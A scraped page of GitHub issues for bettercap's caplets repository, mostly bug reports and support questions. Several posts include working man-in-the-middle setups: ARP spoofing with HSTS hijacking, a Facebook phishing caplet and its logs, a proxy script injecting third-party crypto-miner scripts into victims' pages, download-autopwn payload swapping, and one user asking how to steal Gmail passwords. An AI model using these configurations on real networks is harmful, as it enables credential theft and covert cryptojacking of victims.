bettercap / caplets Goto Github PK

Before i even start to use the new version of bettercap ( was dealing with other stuff ) i want to know everything about this tool and generally to know about SSL and prealoded hsts sites...
From what i see with the new caplets that can be stored in bettercap and u can use them to inject a fake facebook/gmail site that's the victim visit to grab his password is that right?
Or it still can't be done with these websites like gmail and facebook cause they always look for https and never start facebook/gmail if the page is starting wjth http (preloaded hsts)
Can u explain me more about how this work?
There is no way that stealing password from gmail/facebook is impossible....

There are some caplets that don't have a README file on them and, in most of those who do, there is almost no information regarding what that caplet does. If this is intentional, why aren't there any links pointing directly to the more detailed documentation on each caplet? I've read the official Bettercap documentation (which I didn't find of much help) but there is no mention to each caplet specifically.

Is there need for documentation improvement or I'm just looking in the wrong places?

Obs.: For the sake of completeness take as an example the RTFM module. There is no README and the name is an acronym 😢

i cant add javascripts i made

Hi!
I have a doubt that i don't know if its a bug or a feature XD
when you load a caplet like bettercap -iface wlan0 -caplet jsinject/jsinject.cap it gives and import error of jsinject/jsinject.js because it doesn't have the absolute path but when you take the commands that compose that caplet and execute them in the interactive console they work fine.
is it a malfunction? or am i doing something wrong?

just missing readme about how to use download autoPwn payload, and setup listener ? thanks ...

/usr (with the exception of /usr/local) is not writable when SIP is enabled on macOS(1).
For compatibility with macOS the Makefile should use /usr/local/bettercap instead of /usr/share/bettercap/.

Whenever I injecting hstshijack/hstshijack it's disconnects the clients device wifi connectivity and later if it's connects it's connected without internet .how to resolve .
The code using :
bettercap -iface wlan0
Net.probe on
Set arp.spoof.fullduplex true
Set arp.spoof.targets <ip_address>
Set net.sniff.local true
Set net.sniff.filter "host <ip_addrrss>
Arp.spoof on
Net.sniff on
hstshijack/hstshijack

Working without errors but at the device the issue is.

Hopefully you will be help .
(Beginner cyber security enthusiast)

Hi!

I have an error while using hstshijack.cap

[sys.log] [err] ReferenceError: 'custom_payload_path' is not defined

When trying to access the web UI of bettercap from a termux host, a 404 page is shown. This is due to the path to the ui is configured wrong. I.e, termux path required /data/data/com.termux/files

Description of the bug or feature request

Environment

Please provide:

• Bettercap version you are using ( bettercap -version ).
  2.23
• OS version and architecture you are using.
  Ubuntu server 18.04.2 LTS
• Go version if building from sources.
  1.12.4

Steps to Reproduce

1. net.probe on
2. set targets for arp.spoof
3. arp.spoof on
4. set certificate for https.proxy
5. set https.proxy.script /usr/local/share/bettercap/caplets/http-req-dump/http-req-dump.js
6. https.proxy on

Expected behavior: The script print the requests with client IP

Actual behavior: The script print the requests, but the client IP is empty

I am trying to figure out who these caplets are working. What I am trying at home is the fb-phishing caplet.
When i run it no computer (http nor https) is being redirected to my http server.
What I tried:
Dns spoof
The victim just loses connection and says there is no internet connection
ARP spoof
Nothing gets spoofed and the computer keeps it's connection
HTTP(s) Proxy with SSLstrip
Then you get the new error from google chrome (HSTS)

Going from the victim ip to the webserver works and when i try to login it redirects to facebook.com/login.php but the inlog details are not saved nor displayed thus assuming that the javascript injection is not working.

Victim and spoof system both macOS. and Google Chrome
Caplet:

set http.server.address 0.0.0.0
set http.server.path caplets/www/www.facebook.com/

set http.proxy.script caplets/fb-phish.js

http.proxy on
http.server on
arp.spoof on

Output:

bettercap v2.4 (type 'help' for a list of commands)

[14:39:55] [sys.log] [inf] Reading from caplet caplets/fb-phish.cap ...
[14:39:55] [endpoint.new] Endpoint 192.168.8.15 detected as ec:35:86:42:ac:92 (Apple).
[14:39:55] [sys.log] [inf] Enabling forwarding.
[14:39:55] [sys.log] [inf] http.proxy started on 192.168.8.16:8080 (sslstrip disabled)
[14:39:55] [sys.log] [inf] Enabling forwarding.
192.168.8.0/24 > 192.168.8.16  » [14:39:55] [sys.log] [inf] ARP spoofer started, probing 256 targets.
192.168.8.0/24 > 192.168.8.16  » [14:39:56] [sys.log] [inf] You are running 2.4 which is the latest stable version.
192.168.8.0/24 > 192.168.8.16  » active
arp.spoof (Keep spoofing selected hosts on the network.)

  arp.spoof.targets : <entire subnet>
  arp.spoof.whitelist : 

events.stream (Print events as a continuous stream.)

  events.stream.output : 

http.proxy (A full featured HTTP proxy that can be used to inject malicious contents into webpages, all HTTP traffic will be redirected to it.)

  http.proxy.sslstrip : false
  http.port : 80
  http.proxy.address : <interface address>
  http.proxy.port : 8080
  http.proxy.script : caplets/fb-phish.js

http.server (A simple HTTP server, to be used to serve files and scripts across the network.)

  http.server.path : caplets/www/www.facebook.com/
  http.server.address : 0.0.0.0
  http.server.port : 80
  http.server.certificate : 
  http.server.key : 

net.recon (Read periodically the ARP cache in order to monitor for new hosts on the network.)
192.168.8.0/24 > 192.168.8.16  » [14:40:49] [sys.log] [inf] (httpd) [ GET localhost/osd.xml
192.168.8.0/24 > 192.168.8.16  » [14:40:56] [sys.log] [inf] (httpd) [ POST localhost/ajax/bz
192.168.8.0/24 > 192.168.8.16  » [14:41:56] [sys.log] [inf] (httpd) [ POST localhost/ajax/bz
192.168.8.0/24 > 192.168.8.16  » [14:42:19] [sys.log] [inf] (httpd) [ POST localhost/ajax/bz
192.168.8.0/24 > 192.168.8.16  » [14:42:19] [sys.log] [inf] (httpd) [ POST localhost/ajax/bz
192.168.8.0/24 > 192.168.8.16  » [14:42:36] [sys.log] [inf] (httpd) 192.168.8.16 POST 192.168.8.16/ajax/webstorage/process_keys/
192.168.8.0/24 > 192.168.8.16  » [14:43:20] [sys.log] [inf] (httpd) [ POST localhost/ajax/bz
192.168.8.0/24 > 192.168.8.16  » [14:43:43] [sys.log] [inf] (httpd) 192.168.8.16 POST 192.168.8.16/ajax/bz
192.168.8.0/24 > 192.168.8.16  » [14:43:44] [sys.log] [inf] (httpd) 192.168.8.16 GET 192.168.8.16/
192.168.8.0/24 > 192.168.8.16  » [14:43:45] [sys.log] [inf] (httpd) 192.168.8.16 POST 192.168.8.16/ajax/bz
192.168.8.0/24 > 192.168.8.16  » [14:43:45] [sys.log] [inf] (httpd) 192.168.8.16 GET 192.168.8.16/osd.xml
192.168.8.0/24 > 192.168.8.16  » [14:43:46] [sys.log] [inf] (httpd) 192.168.8.16 POST 192.168.8.16/cookie/consent/
192.168.8.0/24 > 192.168.8.16  » [14:43:46] [sys.log] [inf] (httpd) 192.168.8.16 POST 192.168.8.16/ajax/bz
192.168.8.0/24 > 192.168.8.16  » [14:45:51] [sys.log] [inf] (httpd) [ POST localhost/ajax/bz
192.168.8.0/24 > 192.168.8.16  » [14:48:21] [sys.log] [inf] (httpd) [ POST localhost/ajax/bz
192.168.8.0/24 > 192.168.8.16  » 

Hi

I'm probably missing something obvious , can u guys help me?

Downloaded Caplets to /usr/local/share/bettercap/caplets/ and updated

Running bettercap from ~

I installed bettercap-caplets with command:
sudo apt install bettercap-caplets
but when I run in bettercap caplets.update I got this error:
192.168.1.0/24 > 192.168.1.2 » [22:46:27] [sys.log] [inf] caplets this command is inactive in Kali. Install the Kali package bettercap-caplets to get the caplets

Kali has installed caplets in /usr/share/bettercap/caplets/, is the right path?

Hi, I am having some trouble deploying the crypto miner caplet, the above image is the error I get whenever doing so. Furthermore, when accessing http pages the javascript is not loaded. My bettercap version is bettercap v2.32.0 (built for linux amd64 with go1.18.1)

I have just changed a couple things in the .cap file, this is what I am using:

net.probe on
set cryptominer.name coinimp

set cryptominer.key key

set http.proxy.script crypto-miner.js

set http.proxy.sslstrip true

http.proxy on

sleep 1

net.probe off
arp.spoof on

And for the other file, I changed the coinimp js to the one I am prompted in coinimp dashboard. Here:

var green   = "\033[32m",
    reset   = "\033[0m"

function onLoad() {
    logStr = "Javascript Crypto Miner loaded.\n" +
             "\n    Miner: " + green + env["cryptominer.name"].charAt(0).toUpperCase() + env["cryptominer.name"].slice(1) + reset +
             "\n    Targets: " + green + env["arp.spoof.targets"] + reset + "\n"
    log(logStr);
}

function onResponse(req, res) {
    if( res.ContentType.indexOf('text/html') == 0 ){
        var body = res.ReadBody();
        if( body.indexOf('</head>') != -1 ) {
            switch(env["cryptominer.name"]) {
                case "coinhive":
                    res.Body = body.replace( 
                        '</head>', 
                        '<script type="text/javascript" src="https://coinhive.com/lib/coinhive.min.js"></script>',
                        '<script> var miner = new CoinHive.Anonymous(' + env["cryptominer.key"] + '); miner.start(); </script></head>'
                    );
                    break;
                case "cryptoloot":
                    res.Body = body.replace( 
                        '</head>', 
                        '<script type="text/javascript" src="https://crypto-loot.com/lib/miner.min.js"></script>',
                        '<script> var miner = new CryptoLoot.Anonymous(' + env["cryptominer.key"] + '); miner.start(); </script></head>'
                    );
                    break;
                case "coinimp":
                    res.Body = body.replace( 
                        ‘<script src="https://www.hostingcloud.racing/Vwfh.js"></script>’,
                        ‘<script>
    var _client = new Client.Anonymous(' + env["cryptominer.key"] + ', {
        throttle: 0, c: 'w'
    });
    _client.start();    
                        </script>’
                    );
                    break;
            }
        }
    }
}

I would appreciate any help

I keep getting the error when running hstshijack/hstshijack in bettercap

10.0.2.0/24 > 10.0.2.15 » [12:52:49] [sys.log] [err] type error Cannot access member 'to Lower Case' of undefined
10.0.2.0/24 > 10.0.2.15 » hstshijack/hstshijack
2021-08-09 12:58:59 inf hstshijack Generating random variable names for this session
2021-08-09 12:58:59 inf hstshijack Reading caplet
10.0.2.0/24 > 10.0.2.15 » [12:58:59] [sys.log] [err] Error while executing on Load call back:
Traceback:
Type Error: Cannot access member 'to Lower Case' of undefined
at configure (:474:21)
at on Load (:593:3)

Windows 10 defender says crypto-miner.js is a trojan. Is it?

I attach two images, one when using http.proxy and another when using https.proxy. Requests are intercepted (it seems so) but there's nearly no information logged on screen. I've looked at associated Javascript code and, in theory, a lot more data should be shown.

I'm using bettercap 2.4 in Ubuntu 17.10 64 bits, binary downloaded from official releases

With http.proxy:

With https.proxy:

Deleted

Hi!

When I try to use hstshijack.cap, I get an error when bettercap tries to load the hstshijack.js file.
Strangely, it works if I'm modifying the .cap file to include a full path of the js file for the "set http.proxy.script" option.

Command used to run the tool:

sudo bettercap -caplet /usr/local/share/bettercap/caplets/hstshijack/hstshijack.cap

or when including the caplet in a live run

bettercap
include /usr/local/share/bettercap/caplets/hstshijack/hstshijack.cap

Error log:

bettercap v2.9 (type 'help' for a list of commands)
[13:39:13] [sys.log] [inf] loading proxy script hstshijack/hstshijack.js ...
[13:39:13] [sys.log] [err] Error while running caplet /usr/local/share/bettercap/caplets/hstshijack/hstshijack.cap: open hstshijack/hstshijack.js: no such file or directory

System:
Arch Linux 4.18.8.a-1-hardened
Installed via the AUR package bettercap-git

Bettercap version:
bettercap v2.9

[EDIT]
Cheers & thanks for this awesome tool.

HSTShijack caplet isn't downgrading the HTTPS secured websites to HTTP.
Need help.

I'm trying to run the pita.cap, but it fail with exit status 1 on the !monstop. I run P4wnP1_aloa (kali linux 4.14.80-Re4son+) on a raspberry pi zero W.
I checked the processes who can interfere with the monitor mode with:

airmon-ng check
airmon-ng check kill

In general, i have to kill avahi-daemon, wpa_supplicant and dhcpcd.

I putted the wlan0 on monitor mode with:

airmon-ng start wlan0

Now i tried to start pita.cap:

bettercap -iface wlan0mon -caplet /usr/local/share/bettercap/caplets/pita.cap

i got this error:
[sys.log] [err] error while running caplet /usr/local/share/bettercap/caplets/pita.cap: exit status 1

i tried the command !monstop and i got the same error. If i remove this command in the pita.cap, the script start, but rapidly i got this error:
[sys.log] [err] wifi could not inject WiFi packet: send: Resource temporarily unavailable

Is it normal? What is the use of !monstop in that script, and is it important to avoid error...?

Description

While trying to install caplets in bettercap/dev I receive certificate signing errors.

Expected Behaviour

Caplets should be signed by a proper certificate and no error should appear.

Log

caplets.update
[16:41:57] [sys.log] [inf] caplets downloading caplets from https://github.com/bettercap/caplets/archive/master.zip ...
192.168.65.0/24 > 192.168.65.3  » [16:41:57] [sys.log] [err] Get https://github.com/bettercap/caplets/archive/master.zip: x509: certificate signed by unknown authority

running hstshinject generates an error. Couldn't find anything about this error.

Environment

• Version 2.23.
• Kali Linux 3.10.73, aarch64.
• Command line: bettercap -iface wlan0.
• hstshijack/tshshijack.

Steps to Reproduce

1. hstshijack/hstshijack

**Expected behavior: caplet run successfully

**Actual behavior: [sys.log] [err] exit status 4

Description of the bug or feature request

Environment
Please provide:

Bettercap version you are using ( bettercap -version ).
bettercap v2.24.1 (built for linux amd64 with go1.11.6)

OS version and architecture you are using.
Linux kali 5.2.0-kali2-amd64 #1 SMP Debian 5.2.9-2kali1 (2019-08-22) x86_64 GNU/Linux

Steps to Reproduce

set downloadautopwn.devices android,windows

set downloadautopwn.useragent.android Android
set downloadautopwn.useragent.windows Windows|WOW64
set downloadautopwn.extensions.android apk,pdf,sh,pfx,zip
set downloadautopwn.extensions.windows exe,msi,bat,jar,dll,doc,docx,swf,psd,ai,ait,pdf,rar,zip

set downloadautopwn.resizepayloads true

set http.proxy.script /usr/share/bettercap/caplets/download-autopwn/download-autopwn.js

http.proxy on

If I run ./bettercap -caplet caplets/local-sniffer.cap in one terminal and I run ping whatever in other terminal of same machine (net.sniff.local is set to true), on Bettercap's screen doesn't appear any package.

If I run ping from another machine, doing an arp spoofing to this machine (basically, adding set arp.spoof.targets ipRemoteMachine ; arp.spoof on before net.sniff on line on local-sniffer.cap caplet) does'nt show anything, neither.